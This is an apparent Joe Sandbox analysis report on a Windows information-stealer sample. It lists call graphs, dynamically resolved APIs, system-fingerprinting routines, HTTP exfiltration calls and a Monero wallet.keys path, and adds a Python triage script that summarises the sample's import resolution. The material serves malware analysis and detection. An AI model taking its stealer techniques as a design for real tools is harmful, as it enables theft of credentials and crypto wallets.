14945->14946 14947 465a1d 14946->14947 14948 465fc3 InternetCloseHandle 14947->14948 14949 478b60 3 API calls 14947->14949 14950 465fe0 14948->14950 14951 465a3c 14949->14951 14953 469ac0 4 API calls 14950->14953 14952 47a920 3 API calls 14951->14952 14954 465a4f 14952->14954 14955 465fe6 14953->14955 14956 47a8a0 lstrcpy 14954->14956 14957 47a820 2 API calls 14955->14957 14959 46601f codecvt 14955->14959 14961 465a58 14956->14961 14958 465ffd 14957->14958 14960 47a9b0 4 API calls 14958->14960 14963 47a7a0 lstrcpy 14959->14963 14962 466013 14960->14962 14965 47a9b0 4 API calls 14961->14965 14964 47a8a0 lstrcpy 14962->14964 14973 46604f 14963->14973 14964->14959 14966 465a82 14965->14966 14967 47a8a0 lstrcpy 14966->14967 14968 465a8b 14967->14968 14969 47a9b0 4 API calls 14968->14969 14970 465aaa 14969->14970 14971 47a8a0 lstrcpy 14970->14971 14972 465ab3 14971->14972 14974 47a920 3 API calls 14972->14974 14973->13845 14975 465ad1 14974->14975 14976 47a8a0 lstrcpy 14975->14976 14977 465ada 14976->14977 14978 47a9b0 4 API calls 14977->14978 14979 465af9 14978->14979 14980 47a8a0 lstrcpy 14979->14980 14981 465b02 14980->14981 14982 47a9b0 4 API calls 14981->14982 14983 465b21 14982->14983 14984 47a8a0 lstrcpy 14983->14984 14985 465b2a 14984->14985 14986 47a9b0 4 API calls 14985->14986 14987 465b56 14986->14987 14988 47a920 3 API calls 14987->14988 14989 465b5d 14988->14989 14990 47a8a0 lstrcpy 14989->14990 14991 465b66 14990->14991 14992 465b7c InternetConnectA 14991->14992 14992->14948 14993 465bac HttpOpenRequestA 14992->14993 14995 465fb6 InternetCloseHandle 14993->14995 14996 465c0b 14993->14996 14995->14948 14997 47a9b0 4 API calls 14996->14997 14998 465c1f 14997->14998 14999 47a8a0 lstrcpy 14998->14999 15000 465c28 14999->15000 15001 47a920 3 API calls 15000->15001 15002 465c46 15001->15002 15003 47a8a0 lstrcpy 15002->15003 15004 465c4f 15003->15004 15005 47a9b0 4 API calls 15004->15005 15006 465c6e 15005->15006 15007 47a8a0 lstrcpy 15006->15007 15008 465c77 
15007->15008 15009 47a9b0 4 API calls 15008->15009 15010 465c98 15009->15010 15011 47a8a0 lstrcpy 15010->15011 15012 465ca1 15011->15012 15013 47a9b0 4 API calls 15012->15013 15014 465cc1 15013->15014 15015 47a8a0 lstrcpy 15014->15015 15016 465cca 15015->15016 15017 47a9b0 4 API calls 15016->15017 15018 465ce9 15017->15018 15019 47a8a0 lstrcpy 15018->15019 15020 465cf2 15019->15020 15021 47a920 3 API calls 15020->15021 15022 465d10 15021->15022 15023 47a8a0 lstrcpy 15022->15023 15024 465d19 15023->15024 15025 47a9b0 4 API calls 15024->15025 15026 465d38 15025->15026 15027 47a8a0 lstrcpy 15026->15027 15028 465d41 15027->15028 15029 47a9b0 4 API calls 15028->15029 15030 465d60 15029->15030 15031 47a8a0 lstrcpy 15030->15031 15032 465d69 15031->15032 15033 47a920 3 API calls 15032->15033 15034 465d87 15033->15034 15035 47a8a0 lstrcpy 15034->15035 15036 465d90 15035->15036 15037 47a9b0 4 API calls 15036->15037 15038 465daf 15037->15038 15039 47a8a0 lstrcpy 15038->15039 15040 465db8 15039->15040 15041 47a9b0 4 API calls 15040->15041 15042 465dd9 15041->15042 15043 47a8a0 lstrcpy 15042->15043 15044 465de2 15043->15044 15045 47a9b0 4 API calls 15044->15045 15046 465e02 15045->15046 15047 47a8a0 lstrcpy 15046->15047 15048 465e0b 15047->15048 15049 47a9b0 4 API calls 15048->15049 15050 465e2a 15049->15050 15051 47a8a0 lstrcpy 15050->15051 15052 465e33 15051->15052 15053 47a920 3 API calls 15052->15053 15054 465e54 15053->15054 15055 47a8a0 lstrcpy 15054->15055 15056 465e5d 15055->15056 15057 465e70 lstrlen 15056->15057 15853 47aad0 15057->15853 15059 465e81 lstrlen GetProcessHeap RtlAllocateHeap 15854 47aad0 15059->15854 15061 465eae lstrlen 15062 465ebe 15061->15062 15063 465ed7 lstrlen 15062->15063 15064 465ee7 15063->15064 15065 465ef0 lstrlen 15064->15065 15066 465f03 15065->15066 15067 465f1a lstrlen 15066->15067 15855 47aad0 15067->15855 15069 465f2a HttpSendRequestA 15070 465f35 InternetReadFile 15069->15070 15071 465f6a InternetCloseHandle 15070->15071 15075 465f61 
15070->15075 15071->14995 15073 47a9b0 4 API calls 15073->15075 15074 47a8a0 lstrcpy 15074->15075 15075->15070 15075->15071 15075->15073 15075->15074 15078 471077 15076->15078 15077 471151 15077->13847 15078->15077 15079 47a820 lstrlen lstrcpy 15078->15079 15079->15078 15085 470db7 15080->15085 15081 470f17 15081->13855 15082 470e27 StrCmpCA 15082->15085 15083 470e67 StrCmpCA 15083->15085 15084 470ea4 StrCmpCA 15084->15085 15085->15081 15085->15082 15085->15083 15085->15084 15086 47a820 lstrlen lstrcpy 15085->15086 15086->15085 15088 470f67 15087->15088 15089 470fb2 StrCmpCA 15088->15089 15090 471044 15088->15090 15091 47a820 lstrlen lstrcpy 15088->15091 15089->15088 15090->13863 15091->15088 15093 47a740 lstrcpy 15092->15093 15094 471a26 15093->15094 15095 47a9b0 4 API calls 15094->15095 15096 471a37 15095->15096 15097 47a8a0 lstrcpy 15096->15097 15098 471a40 15097->15098 15099 47a9b0 4 API calls 15098->15099 15100 471a5b 15099->15100 15101 47a8a0 lstrcpy 15100->15101 15102 471a64 15101->15102 15103 47a9b0 4 API calls 15102->15103 15104 471a7d 15103->15104 15105 47a8a0 lstrcpy 15104->15105 15106 471a86 15105->15106 15107 47a9b0 4 API calls 15106->15107 15108 471aa1 15107->15108 15109 47a8a0 lstrcpy 15108->15109 15110 471aaa 15109->15110 15111 47a9b0 4 API calls 15110->15111 15112 471ac3 15111->15112 15113 47a8a0 lstrcpy 15112->15113 15114 471acc 15113->15114 15115 47a9b0 4 API calls 15114->15115 15116 471ae7 15115->15116 15117 47a8a0 lstrcpy 15116->15117 15118 471af0 15117->15118 15119 47a9b0 4 API calls 15118->15119 15120 471b09 15119->15120 15121 47a8a0 lstrcpy 15120->15121 15122 471b12 15121->15122 15123 47a9b0 4 API calls 15122->15123 15124 471b2d 15123->15124 15125 47a8a0 lstrcpy 15124->15125 15126 471b36 15125->15126 15127 47a9b0 4 API calls 15126->15127 15128 471b4f 15127->15128 15129 47a8a0 lstrcpy 15128->15129 15130 471b58 15129->15130 15131 47a9b0 4 API calls 15130->15131 15132 471b76 15131->15132 15133 47a8a0 lstrcpy 15132->15133 15134 471b7f 
15133->15134 15135 477500 6 API calls 15134->15135 15136 471b96 15135->15136 15137 47a920 3 API calls 15136->15137 15138 471ba9 15137->15138 15139 47a8a0 lstrcpy 15138->15139 15140 471bb2 15139->15140 15141 47a9b0 4 API calls 15140->15141 15142 471bdc 15141->15142 15143 47a8a0 lstrcpy 15142->15143 15144 471be5 15143->15144 15145 47a9b0 4 API calls 15144->15145 15146 471c05 15145->15146 15147 47a8a0 lstrcpy 15146->15147 15148 471c0e 15147->15148 15856 477690 GetProcessHeap RtlAllocateHeap 15148->15856 15151 47a9b0 4 API calls 15152 471c2e 15151->15152 15153 47a8a0 lstrcpy 15152->15153 15154 471c37 15153->15154 15155 47a9b0 4 API calls 15154->15155 15156 471c56 15155->15156 15157 47a8a0 lstrcpy 15156->15157 15158 471c5f 15157->15158 15159 47a9b0 4 API calls 15158->15159 15160 471c80 15159->15160 15161 47a8a0 lstrcpy 15160->15161 15162 471c89 15161->15162 15863 4777c0 GetCurrentProcess IsWow64Process 15162->15863 15165 47a9b0 4 API calls 15166 471ca9 15165->15166 15167 47a8a0 lstrcpy 15166->15167 15168 471cb2 15167->15168 15169 47a9b0 4 API calls 15168->15169 15170 471cd1 15169->15170 15171 47a8a0 lstrcpy 15170->15171 15172 471cda 15171->15172 15173 47a9b0 4 API calls 15172->15173 15174 471cfb 15173->15174 15175 47a8a0 lstrcpy 15174->15175 15176 471d04 15175->15176 15177 477850 3 API calls 15176->15177 15178 471d14 15177->15178 15179 47a9b0 4 API calls 15178->15179 15180 471d24 15179->15180 15181 47a8a0 lstrcpy 15180->15181 15182 471d2d 15181->15182 15183 47a9b0 4 API calls 15182->15183 15184 471d4c 15183->15184 15185 47a8a0 lstrcpy 15184->15185 15186 471d55 15185->15186 15187 47a9b0 4 API calls 15186->15187 15188 471d75 15187->15188 15189 47a8a0 lstrcpy 15188->15189 15190 471d7e 15189->15190 15191 4778e0 3 API calls 15190->15191 15192 471d8e 15191->15192 15193 47a9b0 4 API calls 15192->15193 15194 471d9e 15193->15194 15195 47a8a0 lstrcpy 15194->15195 15196 471da7 15195->15196 15197 47a9b0 4 API calls 15196->15197 15198 471dc6 15197->15198 15199 47a8a0 lstrcpy 
15198->15199 15200 471dcf 15199->15200 15201 47a9b0 4 API calls 15200->15201 15202 471df0 15201->15202 15203 47a8a0 lstrcpy 15202->15203 15204 471df9 15203->15204 15865 477980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15204->15865 15207 47a9b0 4 API calls 15208 471e19 15207->15208 15209 47a8a0 lstrcpy 15208->15209 15210 471e22 15209->15210 15211 47a9b0 4 API calls 15210->15211 15212 471e41 15211->15212 15213 47a8a0 lstrcpy 15212->15213 15214 471e4a 15213->15214 15215 47a9b0 4 API calls 15214->15215 15216 471e6b 15215->15216 15217 47a8a0 lstrcpy 15216->15217 15218 471e74 15217->15218 15867 477a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15218->15867 15221 47a9b0 4 API calls 15222 471e94 15221->15222 15223 47a8a0 lstrcpy 15222->15223 15224 471e9d 15223->15224 15225 47a9b0 4 API calls 15224->15225 15226 471ebc 15225->15226 15227 47a8a0 lstrcpy 15226->15227 15228 471ec5 15227->15228 15229 47a9b0 4 API calls 15228->15229 15230 471ee5 15229->15230 15231 47a8a0 lstrcpy 15230->15231 15232 471eee 15231->15232 15870 477b00 GetUserDefaultLocaleName 15232->15870 15235 47a9b0 4 API calls 15236 471f0e 15235->15236 15237 47a8a0 lstrcpy 15236->15237 15238 471f17 15237->15238 15239 47a9b0 4 API calls 15238->15239 15240 471f36 15239->15240 15241 47a8a0 lstrcpy 15240->15241 15242 471f3f 15241->15242 15243 47a9b0 4 API calls 15242->15243 15244 471f60 15243->15244 15245 47a8a0 lstrcpy 15244->15245 15246 471f69 15245->15246 15874 477b90 15246->15874 15248 471f80 15249 47a920 3 API calls 15248->15249 15250 471f93 15249->15250 15251 47a8a0 lstrcpy 15250->15251 15252 471f9c 15251->15252 15253 47a9b0 4 API calls 15252->15253 15254 471fc6 15253->15254 15255 47a8a0 lstrcpy 15254->15255 15256 471fcf 15255->15256 15257 47a9b0 4 API calls 15256->15257 15258 471fef 15257->15258 15259 47a8a0 lstrcpy 15258->15259 15260 471ff8 15259->15260 15886 477d80 GetSystemPowerStatus 15260->15886 15263 47a9b0 4 API calls 15264 472018 15263->15264 15265 47a8a0 lstrcpy 15264->15265 15266 
[Control-flow graph (call graph) for the routine spanning 00472021–00472699 and its callees; the rendered graph is not reproduced. API calls named in the graph nodes, grouped by sub-routine:]
• Throughout: 47a740 / 47a7a0 / 47a8a0 / 461590 lstrcpy, 47a920 lstrcpy, lstrcat and 47a9b0 lstrcpy, lstrlen, lstrcpy, lstrcat are interleaved between every collector call (string assembly)
• 47207e GetCurrentProcessId → 479470 OpenProcess → 479493 GetModuleFileNameExA, CloseHandle
• 477e00 GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA → 477e68 RegQueryValueExA → 477e8e RegCloseKey
• 477f60 → 477fb9 GetLogicalProcessorInformationEx → 477fd8 GetLastError → 477fe3 (allocates via 478a10 GetProcessHeap, RtlAllocateHeap and loops back to 477fb9) → 478029 → 4789f0 GetProcessHeap, HeapFree → 478084 wsprintfA
• 477ed0 GetSystemInfo, wsprintfA
• 478100 GetProcessHeap, RtlAllocateHeap → 4789b0 → 47814d GlobalMemoryStatusEx → 478163 __aulldiv → 47819b wsprintfA
• 4787c0 → 4787fb GetProcessHeap, RtlAllocateHeap, wsprintfA
• 4781f0 → string assembly only (47a740, 47a8a0, 47a9b0, 47a7a0)
• 478320 → 47835c RegOpenKeyExA → 4783f8 RegEnumKeyExA → 47843f wsprintfA, RegOpenKeyExA → 4784c1 RegQueryValueExA → 4784fa lstrlen → 47856e RegQueryValueExA → 478601 / 478613 RegCloseKey (478485 RegCloseKey ×2 on the other branch)
• 478680 → 4786bc CreateToolhelp32Snapshot, Process32First → 4786e8 Process32Next (loop) → 47875d CloseHandle
• 477bcc GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList → 477c46 GetLocaleInfoA (per layout, looping via 477c25) → 477d1e LocalFree
• 477a9a wsprintfA; 477b4d → 478d20 LocalAlloc, CharToOemW
• 4777a0 → 477720 GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA → 477765 RegQueryValueExA → 477780 RegCloseKey → 4776c6 RegOpenKeyExA → 4776e7 RegQueryValueExA → 477704 RegCloseKey
• 478b60 → 478b82 GetSystemTime; 47a920 → 47a968 lstrcpy, lstrcat
• 469af9 LocalAlloc → 469b14 CryptStringToBinaryA → 469b39 LocalFree; 478ea0 → 478ead CryptBinaryToStringA → 478ece GetProcessHeap, RtlAllocateHeap → 478f05 CryptBinaryToStringA
• 464838 lstrlen → 47aad0 → 464848 InternetCrackUrlA; 47aad0 → 465009 InternetOpenUrlA → 46502a InternetReadFile (loop) → 4650a0 InternetCloseHandle, InternetCloseHandle
• 470799, 470865, 47099c StrCmpCA; 470250 → 47a740 lstrcpy → 478de0 (2 API calls, unnamed)
• 475190 → 465100 → 4647b0 (2 API calls) → 478ea0 (CryptBinaryToStringA, above) → 465192 lstrlen → 4651fd InternetOpenA, StrCmpCA → 478b60 (GetSystemTime) → 465329 InternetConnectA → 465359 HttpOpenRequestA → string assembly (graph text truncated in the report); 4658b7, 4658c4 InternetCloseHandle
• 4698d0 → 469880 → 466fb0 → 466d40 → 466530 (478a10 GetProcessHeap, RtlAllocateHeap; 46668f, 466743 VirtualAlloc) → 4669b0 → 466a09 LoadLibraryA → 466ba8 GetProcAddress (loop, buffers via 478a10 / 4789f0) → 466ee6 VirtualFree → 466f26 FreeLibrary (loop) → 4789f0 GetProcessHeap, HeapFree

                      Control-flow Graph
                      • Rendered basic-block graph for 00479860–00479BC2 not reproduced. Blocks from the graph data: 479860–479874 call 479750; 47987a–479a8e call 479780, GetProcAddress ×21 (479860 can also branch straight past this block); 479a93–479af2 LoadLibraryA ×5; then conditionally entered resolves 479af4–479b08 GetProcAddress, 479b16–479b41 GetProcAddress ×2, 479b4f–479b63 GetProcAddress, 479b71–479b84 GetProcAddress, 479b92–479bbc GetProcAddress ×2; return 479bc1–479bc2.
                      APIs
                      • GetProcAddress.KERNEL32(75900000,00E807C8), ref: 004798A1
                      • GetProcAddress.KERNEL32(75900000,00E807F8), ref: 004798BA
                      • GetProcAddress.KERNEL32(75900000,00E80810), ref: 004798D2
                      • GetProcAddress.KERNEL32(75900000,00E805A0), ref: 004798EA
                      • GetProcAddress.KERNEL32(75900000,00E80840), ref: 00479903
                      • GetProcAddress.KERNEL32(75900000,00E88BA0), ref: 0047991B
                      • GetProcAddress.KERNEL32(75900000,00E765C0), ref: 00479933
                      • GetProcAddress.KERNEL32(75900000,00E762A0), ref: 0047994C
                      • GetProcAddress.KERNEL32(75900000,00E806F0), ref: 00479964
                      • GetProcAddress.KERNEL32(75900000,00E80648), ref: 0047997C
                      • GetProcAddress.KERNEL32(75900000,00E80708), ref: 00479995
                      • GetProcAddress.KERNEL32(75900000,00E80558), ref: 004799AD
                      • GetProcAddress.KERNEL32(75900000,00E76480), ref: 004799C5
                      • GetProcAddress.KERNEL32(75900000,00E80570), ref: 004799DE
                      • GetProcAddress.KERNEL32(75900000,00E80588), ref: 004799F6
                      • GetProcAddress.KERNEL32(75900000,00E763C0), ref: 00479A0E
                      • GetProcAddress.KERNEL32(75900000,00E805B8), ref: 00479A27
                      • GetProcAddress.KERNEL32(75900000,00E80870), ref: 00479A3F
                      • GetProcAddress.KERNEL32(75900000,00E764C0), ref: 00479A57
                      • GetProcAddress.KERNEL32(75900000,00E80888), ref: 00479A70
                      • GetProcAddress.KERNEL32(75900000,00E76400), ref: 00479A88
                      • LoadLibraryA.KERNEL32(00E80900,?,00476A00), ref: 00479A9A
                      • LoadLibraryA.KERNEL32(00E808A0,?,00476A00), ref: 00479AAB
                      • LoadLibraryA.KERNEL32(00E808E8,?,00476A00), ref: 00479ABD
                      • LoadLibraryA.KERNEL32(00E808D0,?,00476A00), ref: 00479ACF
                      • LoadLibraryA.KERNEL32(00E808B8,?,00476A00), ref: 00479AE0
                      • GetProcAddress.KERNEL32(75070000,00E80918), ref: 00479B02
                      • GetProcAddress.KERNEL32(75FD0000,00E80858), ref: 00479B23
                      • GetProcAddress.KERNEL32(75FD0000,00E88DC0), ref: 00479B3B
                      • GetProcAddress.KERNEL32(75A50000,00E88D00), ref: 00479B5D
                      • GetProcAddress.KERNEL32(74E50000,00E76360), ref: 00479B7E
                      • GetProcAddress.KERNEL32(76E80000,00E88A00), ref: 00479B9F
                      • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00479BB6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess$`c
                      • API String ID: 2238633743-1585215645
                      • Opcode ID: a86a764a79c88195e6165f9bdd55aeda04ca4e3213eaf4f79ec1116cfda364e9
                      • Instruction ID: 88bef62ee63f4bcc776bfdfc2886e82a53414849cead6942b7ce4c9a593b5ad2
                      • Opcode Fuzzy Hash: a86a764a79c88195e6165f9bdd55aeda04ca4e3213eaf4f79ec1116cfda364e9
                      • Instruction Fuzzy Hash: FCA12AB9500250AFD394FFE8ED88AA637FBF74B201714A61BE60583265D739B841CF52
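Reading of the 33 API bullets on this card: 28 GetProcAddress calls, 21 of them against the same module handle 75900000, plus 5 LoadLibraryA calls, and exactly one export name, NtQueryInformationProcess, printed in cleartext. Every other name argument is a pointer in the 00E7xxxx–00E8xxxx range, which lies outside every memory dump this report lists (0x460000 up to 0xAE7000), so the names were written into a buffer outside the image at run time rather than read from the import table; that is what the report's "dynamically determine API calls" and "extensive use of GetProcAddress" signatures key on. Which DLL sits at 75900000 or the other handles is not stated on the page and should not be guessed from the handle value. The script below is an added triage helper, not part of the report or of the sample: it parses bullets in this format, groups the resolves by module handle and classifies the name arguments. Its sample is eight of the bullets above, and the image span it uses is an assumption built from the dump offsets.

```python
"""Summarise dynamic import resolution from the 'APIs' bullets of a Joe Sandbox
function card. Added analysis helper; not part of the report or of the sample."""
import re
from collections import Counter

# "• GetProcAddress.KERNEL32(75900000,00E807C8), ref: 004798A1"
API_LINE = re.compile(r"^\W*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]{8})\s*$")
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Assumption: the mapped image spans the dump offsets listed in this report
# (first dump at 0x460000, last at 0xAE7000) plus one page.
IMAGE_RANGE = (0x00460000, 0x00AE8000)

# Constructed sample: eight of the 33 bullets on this card, copied as printed.
SAMPLE = """
• GetProcAddress.KERNEL32(75900000,00E807C8), ref: 004798A1
• GetProcAddress.KERNEL32(75900000,00E807F8), ref: 004798BA
• GetProcAddress.KERNEL32(75900000,00E80810), ref: 004798D2
• LoadLibraryA.KERNEL32(00E80900,?,00476A00), ref: 00479A9A
• LoadLibraryA.KERNEL32(00E808A0,?,00476A00), ref: 00479AAB
• GetProcAddress.KERNEL32(75070000,00E80918), ref: 00479B02
• GetProcAddress.KERNEL32(76E80000,00E88A00), ref: 00479B9F
• GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00479BB6
"""

def parse_api_lines(text):
    """One dict per API bullet: api, module, argument strings, call-site address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if m:
            api, module, args, ref = m.groups()
            calls.append({"api": api, "module": module,
                          "args": [a.strip() for a in args.split(",")],
                          "ref": int(ref, 16)})
    return calls

def classify_pointer(arg, image_range):
    """'inside' / 'outside' the image for a hex pointer, None for anything else."""
    if not HEX32.match(arg):
        return None
    lo, hi = image_range
    return "inside" if lo <= int(arg, 16) < hi else "outside"

def resolve_summary(calls, image_range=IMAGE_RANGE):
    """Count LoadLibraryA calls, group GetProcAddress by module handle and classify
    the name argument: cleartext export name, pointer into the image (a plain
    string in the binary) or pointer outside it (a buffer filled at run time).
    LoadLibraryA takes one argument; the report prints extra stack values after it."""
    out = {"loadlibrary": 0, "by_module": Counter(), "cleartext": [],
           "names_inside_image": 0, "names_outside_image": 0}
    for c in calls:
        if c["api"] == "LoadLibraryA":
            out["loadlibrary"] += 1
            where = classify_pointer(c["args"][0], image_range)
        elif c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            handle, name = c["args"][:2]
            out["by_module"][handle.upper()] += 1
            where = classify_pointer(name, image_range)
            if where is None and name != "?":
                out["cleartext"].append(name)
        else:
            continue
        if where:
            out["names_%s_image" % where] += 1
    out["by_module"] = dict(out["by_module"])
    return out

def resolves_in_routine(calls, start, end):
    """GetProcAddress call sites inside one routine: a high count in a single
    function is the 'extensive use of GetProcAddress' pattern."""
    return sum(1 for c in calls
               if c["api"] == "GetProcAddress" and start <= c["ref"] <= end)

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print(resolve_summary(calls))
    print("resolves in 00479860-00479BC2:", resolves_in_routine(calls, 0x479860, 0x479BC2))
```

Run on the full bullet list, the same functions give 28 resolves inside 00479860–00479BC2 with one cleartext name; the per-handle counts tell you which loaded module the sample leans on most, which is the first thing to map when you rebuild the import table from a memory dump.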

                      Control-flow Graph
                      • Rendered basic-block graph for 004645C0–004647A9 not reproduced. Blocks from the graph data: 4645c0–464695 RtlAllocateHeap; loop 4646a0–4646a6 → 4646ac–46474a → back to 4646a0; exit 46474f–4647a9 VirtualProtect.
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0046460F
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0046479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30): 004645C7, 004645D2, 004645DD, 004645E8, 004645F3, 00464617, 00464622, 0046462D, 00464638, 00464643, 00464657, 00464662, 0046466D, 00464678, 00464683, 004646AC, 004646B7, 004646C2, 004646CD, 004646D8, 00464713, 0046471E, 00464729, 00464734, 0046473F, 0046474F, 0046475A, 00464765, 00464770, 0046477B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the original field repeats this one sentence, '$'-separated)
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: 112af7c8d25c565725d371fee94c8a8986110fb840c166cdc8ab4b1e9f37fc1b
                      • Instruction ID: 4a6562d5d55d7cd0a682a7dcf8d62d138677099f9cb6274f8c68d84b42ef8eaa
                      • Opcode Fuzzy Hash: 112af7c8d25c565725d371fee94c8a8986110fb840c166cdc8ab4b1e9f37fc1b
                      • Instruction Fuzzy Hash: 2741E2707C2704FBE626B7A4A8C2F9D7756DFCA708FB05846EA00526C0CBAC754047BA

                      Control-flow Graph
                      (graph rendering not reproduced in text; legend: Executed / Not Executed)
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                        • Part of subcall function 004647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00464915
                      • StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 0046493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00464ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00480DDB,00000000,?,?,00000000,?,",00000000,?,00E8E3F0), ref: 00464DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00464E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00464E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00464E49
                      • InternetCloseHandle.WININET(00000000), ref: 00464EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00464EC5
                      • HttpOpenRequestA.WININET(00000000,00E8E270,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00464B15
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • InternetCloseHandle.WININET(00000000), ref: 00464ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
